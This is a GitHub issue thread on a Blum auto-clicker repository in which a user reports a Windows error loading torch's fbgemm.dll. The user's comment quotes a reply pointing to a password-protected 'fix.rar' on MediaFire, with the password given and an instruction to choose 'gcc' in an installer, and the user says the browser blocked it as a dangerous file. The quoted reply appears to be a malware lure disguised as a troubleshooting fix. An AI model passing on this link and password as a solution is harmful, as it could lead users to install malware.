### ISSUE TITLE
how to solve this problem

### ISSUE THREAD

**Issue by ahtisham49** [devbutlazy/Blum-AutoClicker#2]
Traceback (most recent call last):
  File "<frozen runpy>", line 189, in _run_module_as_main
  File "<frozen runpy>", line 112, in _get_module_details
  File "C:\Users\LENOVO\Desktop\blum-autoclicker-main\main.py", line 12, in <module>
    from ultralytics import YOLO
  File "C:\Users\LENOVO\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\__init__.py", line 10, in <module>
    from ultralytics.data.explorer.explorer import Explorer
  File "C:\Users\LENOVO\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\data\__init__.py", line 3, in <module>
    from .base import BaseDataset
  File "C:\Users\LENOVO\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\data\base.py", line 15, in <module>
    from torch.utils.data import Dataset
  File "C:\Users\LENOVO\AppData\Local\Programs\Python\Python312\Lib\site-packages\torch\__init__.py", line 148, in <module>
    raise err
OSError: [WinError 126] The specified module could not be found. Error loading "C:\Users\LENOVO\AppData\Local\Programs\Python\Python312\Lib\site-packages\torch\lib\fbgemm.dll" or one of its dependencies.

**Comment by ahtisham49** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

it shows dangerous file blocked
